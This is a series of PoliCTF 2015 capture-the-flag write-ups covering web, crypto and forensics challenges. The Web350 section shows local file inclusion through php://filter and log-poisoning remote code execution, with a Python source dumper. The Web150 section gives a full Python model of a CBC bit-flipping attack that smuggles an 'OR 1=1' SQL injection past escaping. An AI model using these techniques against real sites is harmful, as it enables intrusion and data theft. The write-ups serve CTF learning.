PoliCTF 2015. Web350 - Magic Chall

We are presented with a web application that lets us register an account, log in and be surprised with random disturbing videos xDDD. The application uses a page parameter to reference and include other pages, and it is vulnerable to LFI. For example, instead of going to http://magic.polictf.it/magic_things.php we can include it through index.php with http://magic.polictf.it/index.php?page=magic_things. So it seems we can include any file ending in .php, since the application appends the extension itself and we cannot discard it with a null byte.
The first thing to try in a PHP application is the php:// filters, so we try to read the source code with the base64 filter:
http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index and voilà, the site returns a base64-encoded copy of the index.php source code (the appended extension turns resource=index into resource=index.php). From there we proceeded to collect and read all the source code and included files. Interesting things:

1 - Running any method on a Magic instance will print the flag:

2 - Log files are written to $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname(), so we control the file extension by setting our surname to foo.php. Since we also control the user's Name, we can inject arbitrary strings into the log. This smells like remote code execution.

Now all we need to do is register a user with Name: <?php (new Magic())->test();?> and surname: foo.php, then visit the log file and read the flag:
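As an added example (not the writeup's own code), here is a small Python dumper for the "collect and read all source code and included files" step: it requests each page through the php://filter base64 wrapper exactly as in the URL above, decodes what comes back, and follows any literal include/require it finds. The include and base64 regexes are heuristics, and SAMPLE_SITE with its fake fetcher is a constructed stand-in for the challenge's files so the dumper runs offline.

```python
import base64
import re
from urllib.request import urlopen

# php://filter wrapper: include() then returns the file's base64 instead of
# executing it. index.php appends ".php", so the resource is named without it.
FILTER = "php://filter/convert.base64-encode/resource="

# Literal include/require of another .php file (heuristic; dynamic includes such
# as include($_GET['page'] . '.php') are deliberately not followed).
INCLUDE_RE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([\w./-]+?)\.php['"]""")

# A run of base64 long enough to be a PHP file rather than page chrome (heuristic).
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def filter_url(index_url: str, page: str) -> str:
    """URL that reads <page>.php through the base64 filter."""
    return f"{index_url}?page={FILTER}{page}"


def extract_source(body: str):
    """Pull the base64 blob out of the returned HTML and decode it, or None."""
    m = B64_RE.search(body)
    if not m:
        return None
    return base64.b64decode(m.group(0)).decode("utf-8", "replace")


def find_includes(source: str) -> set:
    return set(INCLUDE_RE.findall(source))


def http_fetch(url: str) -> str:
    return urlopen(url).read().decode("utf-8", "replace")


def dump_sources(index_url: str, fetch=http_fetch, start: str = "index") -> dict:
    """Walk the include graph from `start`, reading every file through the
    filter. Returns {page: source or None if nothing decodable came back}."""
    sources, todo = {}, [start]
    while todo:
        page = todo.pop()
        if page in sources:
            continue
        src = extract_source(fetch(filter_url(index_url, page)))
        sources[page] = src
        if src:
            todo.extend(p for p in find_includes(src) if p not in sources)
    return sources


# Constructed stand-in for the challenge's files (not the real source) so the
# dumper can be exercised offline; fake_fetch answers filter URLs from it.
SAMPLE_SITE = {
    "index": "<?php require_once('lib/magic.php'); include($_GET['page'] . '.php'); ?>",
    "lib/magic": "<?php class Magic { function test() { echo 'the flag'; } } ?>",
    "magic_things": "<?php include 'header.php'; ?>",
}


def fake_fetch(url: str) -> str:
    page = url.split("resource=", 1)[1]
    if page not in SAMPLE_SITE:
        return "<html><body>Warning: include(): failed to open stream</body></html>"
    blob = base64.b64encode(SAMPLE_SITE[page].encode()).decode()
    return f"<html><body>{blob}</body></html>"


if __name__ == "__main__":
    for page, src in dump_sources("http://magic.polictf.it/index.php", fake_fetch).items():
        print(f"=== {page}.php ===\n{src}\n")
```

Against the live target you would pass the default http_fetch; the decoded sources are where the Magic class and the log path in the two points above were found.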

PoliCTF 2015. Web150 - John The Referee

We are presented with an online shop to buy Referee t-shirts:

They have ids from 1-8 and then 10 (skipping 9).

There is also a search form that seems to escape some characters:

The search submission is somewhat weird. Our search is submitted to the server, which returns a hash that we submit back to get the actual results. So either the hash is an encrypted version of our search query that is decrypted and executed on the server, or it is an identifier that is mapped back to our query in the server session. Since there are no session cookies, it seems to be the former. So the process is the following: we submit our search query, the server escapes and encrypts it, and we get the encrypted value, which we submit again for the server to decrypt and run. Since the query was escaped before encryption, there is no reason not to trust the decrypted query, right? Did someone say integrity? Encryption without a MAC does not stop us from modifying the ciphertext, and in CBC mode flipping a bit of one ciphertext byte flips the same bit in the corresponding plaintext byte of the following block (and garbles the block the flipped byte belongs to). So all we have to do is submit our SQLi payload with the single quote replaced by an arbitrary character, then bit-flip that character's ciphertext position and send it to the server until one of the flipped queries contains a single quote:

Now we can take the encrypted query and replay it, bit-flipping the ciphertext byte of the placeholder character (a) until either it or the same position in the next block (the CBC effect) becomes a single quote. We get the flag:
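As an added example (not the writeup's code), the following Python script models the search endpoint and the bit-flipping attack. A toy Feistel block cipher built on SHA-256 stands in for the server's unknown cipher: the property being abused, that XORing a byte of the IV or of a ciphertext block XORs the same byte of the next plaintext block while garbling the block it belongs to, holds for any block cipher in CBC mode. The query template, the addslashes-style escaping and the IV-first token layout are assumptions. It also goes one step beyond the brute force above: because we chose the placeholder, a single XOR with 'a' ^ "'" converts it, and 32 junk characters in front of the placeholder absorb the garbled block wherever the unknown prefix ends, so the only search left is for the placeholder's offset.

```python
import hashlib
import os

BLOCK = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Round function of the toy Feistel cipher (a stand-in for AES; the CBC
    # malleability demonstrated below does not depend on the block cipher).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(8):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(8)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def pad(data: bytes) -> bytes:  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        return None
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        c = ct[i:i + BLOCK]
        out += _xor(block_decrypt(key, c), prev)
        prev = c
    return out


class Shop:
    """Hypothetical model of the search endpoint: escape, encrypt and hand the
    token to the client; later decrypt it and run the query, with no MAC."""

    def __init__(self):
        self.key = os.urandom(16)

    def prepare(self, search: str) -> bytes:
        escaped = search.replace("\\", "\\\\").replace("'", "\\'")  # addslashes-like
        query = b"SELECT * FROM tshirts WHERE name LIKE '%" + escaped.encode() + b"%'"
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pad(query))  # token = IV || ciphertext

    def run(self, token: bytes):
        """Returns the query the server would execute (None on bad padding)."""
        return unpad(cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:]))


def flip(token: bytes, offset: int, have: str, want: str) -> bytes:
    """Turn plaintext byte `offset` from `have` into `want`. Token byte `offset`
    (in the IV or the previous ciphertext block) is XORed into exactly that
    plaintext byte on decryption, so the edit is precise; the side effect is
    that the whole plaintext block the edited ciphertext byte belongs to
    decrypts to garbage (no side effect when the edited byte is in the IV)."""
    t = bytearray(token)
    t[offset] ^= ord(have) ^ ord(want)
    return bytes(t)


JUNK = "x" * 32                   # absorbs the garbled block wherever the prefix ends
PAYLOAD = JUNK + "a OR 1=1 -- "   # 'a' is the placeholder for the single quote


def attack(shop: Shop):
    """The prefix length is unknown client-side, so try every offset for the
    placeholder. Returns (offset, forged query) or (None, None)."""
    token = shop.prepare(PAYLOAD)
    for off in range(len(token)):
        query = shop.run(flip(token, off, "a", "'"))
        if query and b"' OR 1=1 -- " in query:
            return off, query
    return None, None


if __name__ == "__main__":
    off, query = attack(Shop())
    print(off, query)
```

In the real challenge the oracle is the search result rather than the decrypted query, and if one of the garbled junk bytes happens to be a quote or backslash the query breaks; you simply request a fresh token (new IV, new garbage) and flip again. The fix is the one the writeup hints at: authenticate the token (encrypt-then-MAC or an AEAD) and refuse anything that fails verification.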

PoliCTF 2015. Web100 - John The Traveller

The challenge description reads: Holidays are here! But John still hasn't decided where to spend them and time is running out: flights are overbooked and prices are rising every second. Fortunately, John just discovered a website where he can book last-second flights to all the European capitals; however, there's no time to waste, so he just grabs his suitcase and, thanks to his new smartphone, looks the city of his choice up while rushing to the airport. There he goes! Flight is booked so... hauskaa lomaa!

We are presented with a web application that allows us to search for flights to European capitals. It doesn't seem injectable and there's nothing weird about it: the website returns a random number of flights with their prices in EUR and nothing else.

After losing a lot of time on this one, we re-read the challenge description once again and wondered about hauskaa lomaa. It turns out it means happy holidays in Finnish. So we checked flights to Helsinki and finally found something out of the ordinary: the price was in px (pixels?) and there were always 6 results:

After having a look at the page source we realized that it contains a responsive UI and that the result table uses special CSS classes, selected by viewport width:

After loading the page in a device emulator at any of those widths, we get a QR code:

Flag is: flag{run_to_the_hills_run_for_your_life}

PoliCTF 2015. Crypto100 - And the prophet said

We are given a text that looks like base64, so we decode it and find a gzip file that contains a text file with 296 lines, each a phrase from the Bible. The phrases repeat, so we assigned a character to each distinct phrase and got something like:

abccde fagh iajccbklb gh mbno bjho ghkpf gfq gpr fnogkl fd sngfb j cdkl rbhhjlb hd hfjfghfgih sgcc abct odu sgfa fab cbffbn vnbwubkigbhx yuf gpr kdf nbjcco lddz jf fajfx d0 fajfph bkdulae jajae gpr gk cdmb sgfa hgrtcb cdsbnijhb vcjlh sgfaduf htjibh jkz hfnjklb horydchx vcjl1cyafyllumvhokfyywsyd2  

Using a substitution-cipher solver (letter frequencies) and a little manual correction we get:

hello, this challenge is very easy isn't it? i'm trying to write a long message so statistics will help you with the letter frequencies. but i'm not really good at that. ok that's enough, ahah, i'm in love with simple lowercase flags without spaces and strange symbols. flag{lbhtbgguvfsyntbbqwbo}  

So the flag is:


Which turns out not to be a valid flag. But the challenge description said we need an extra step here, so we try to decode it with decoders such as ROT13 and voilà:


PoliCTF 2015. Forensics100 - John In The Middle

We are given a pcap with the traffic generated by a visit to an old version of http://polictf.it. We can use NetworkMiner or a similar tool to extract all the transferred files and compare them with the originals. logo.png differs from the original and, using StegSolve, we can find the secret flag: